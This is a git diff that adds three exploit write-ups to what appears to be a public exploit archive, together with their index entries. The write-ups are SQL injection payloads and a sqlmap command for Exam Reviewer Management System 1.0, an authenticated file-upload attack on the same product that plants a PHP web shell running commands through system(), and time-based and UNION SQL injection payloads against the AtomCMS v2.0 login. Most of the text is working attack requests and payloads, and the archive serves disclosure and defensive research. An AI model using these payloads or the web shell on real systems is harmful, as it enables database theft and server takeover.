diff --git a/exploits/php/webapps/50725.txt b/exploits/php/webapps/50725.txt new file mode 100644 index 000000000..92441d248 --- /dev/null +++ b/exploits/php/webapps/50725.txt @@ -0,0 +1,64 @@ +# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection +# Date: 2022-02-18 +# Exploit Author: Juli Agarwal(@agarwaljuli) +# Vendor Homepage: +https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html + +# Software Link: +https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code + +# Version: 1.0 +# Tested on: Windows 10/Kali Linux + + + +Description – The ‘id’ parameter in Exam Reviewer Management System web +application is vulnerable to SQL Injection + +Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1 + + + +POC:- + + + +--- + +Parameter: id (GET) + +Type: boolean-based blind + +Title: AND boolean-based blind - WHERE or HAVING clause + +Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu + + + +Type: error-based + +Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY +clause (FLOOR) + +Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT +COUNT(*),CONCAT(0x71766a7071,(SELECT +(ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA + + + +Type: time-based blind + +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo) +AND 'vqGg'='vqGg--- + + + +*SQLMAP COMMAND* + + + +*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1 +" -p id --dbs --level 3* \ No newline at end of file diff --git a/exploits/php/webapps/50726.txt b/exploits/php/webapps/50726.txt new file mode 100644 index 000000000..e5ceb3c08 --- /dev/null +++ b/exploits/php/webapps/50726.txt @@ -0,0 +1,144 @@ +# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) +# Date: 2022-02-08 +# Exploit Author: Juli Agarwal(@agarwaljuli) +# Vendor Homepage: +https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html + +# Software Link: +https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code + +# Version: 1.0 +# Tested on: XAMPP, Kali Linux + + + +Description – The application suffers from a remote code execution in the +admin panel. An authenticated attacker can upload a web-shell php file in +profile page to achieve remote code execution. + + + +POC:- + + + +========== + +# Request: + +========== + +POST /erms/classes/Users.php?f=save HTTP/1.1 + +Host: localhost + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 +Firefox/91.0 + +Accept: */* + +Accept-Language: en-US,en;q=0.5 + +X-Requested-With: XMLHttpRequest + +Content-Type: multipart/form-data; +boundary=---------------------------37791356766765055891341961306 + +Content-Length: 1004 + +Origin: http://localhost + +Connection: close + +Referer: http://localhost/erms/admin/?page=user + +Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a + + + +-----------------------------37791356766765055891341961306 + +Content-Disposition: form-data; name="id" + + + +1 + +-----------------------------37791356766765055891341961306 + +Content-Disposition: form-data; name="firstname" + + + +Adminstrator + +-----------------------------37791356766765055891341961306 + +Content-Disposition: form-data; name="lastname" + + + +Admin + +-----------------------------37791356766765055891341961306 + +Content-Disposition: form-data; name="username" + + + +admin + +-----------------------------37791356766765055891341961306 + +Content-Disposition: form-data; name="password" + + + +-----------------------------37791356766765055891341961306 + +Content-Disposition: form-data; name="img"; filename="shell.php" + +Content-Type: application/x-php + + + + + + + +Remote code execution: 
+
+                              "; $cmd = ($_REQUEST['cmd']); system($cmd); echo "
"; die; }?> + + + + + + + + + +-----------------------------37791356766765055891341961306— + + + +================ + +# Webshell access: + +================ + + + +# Webshell access via: + +POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id + + + +# Webshell response: + +Remote code execution: + +uid=1(daemon) gid=1(daemon) groups=1(daemon) \ No newline at end of file diff --git a/exploits/php/webapps/50727.txt b/exploits/php/webapps/50727.txt new file mode 100644 index 000000000..b4cb71724 --- /dev/null +++ b/exploits/php/webapps/50727.txt @@ -0,0 +1,60 @@ +# Exploit Title: AtomCMS v2.0 - SQLi +# Date: 08/02/2022 +# Exploit Author: Luca Cuzzolin aka czz78 +# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS +# Version: v2.0 +# Category: Webapps +# Tested on: Debian linux +# CVE : CVE-2022-24223 + + +==================================================== + +# PoC : SQLi : + +http://127.0.0.1/Atom.CMS/admin/login.php + + +POST /Atom.CMS/admin/login.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 +Firefox/91.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: it,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 35 +Origin: http://127.0.0.1 +Connection: keep-alive +Referer: http://127.0.0.1/Atom.CMS/admin/login.php +Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +email=test%40test.com&password=1234 + + +Vulnerable Payload : + +Parameter: email (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: email=test@test.com' AND (SELECT 5613 FROM +(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234 + Vector: AND (SELECT [RANDNUM] FROM +(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + Type: UNION query + Title: Generic UNION query (NULL) - 6 columns + Payload: email=test@test.com' UNION ALL SELECT +NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL-- +-&password=1234 + Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- - +--- + + + +==================================================== \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 035d3d20e..416d9098c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44799,3 +44799,6 @@ id,file,description,date,author,type,platform,port 50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php, 50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php, 50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php, +50725,exploits/php/webapps/50725.txt,"Exam Reviewer Management System 1.0 - ‘id’ SQL Injection",1970-01-01,"Juli Agarwal",webapps,php, +50726,exploits/php/webapps/50726.txt,"Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Juli Agarwal",webapps,php, +50727,exploits/php/webapps/50727.txt,"AtomCMS v2.0 - SQLi",1970-01-01,"Luca Cuzzolin",webapps,php,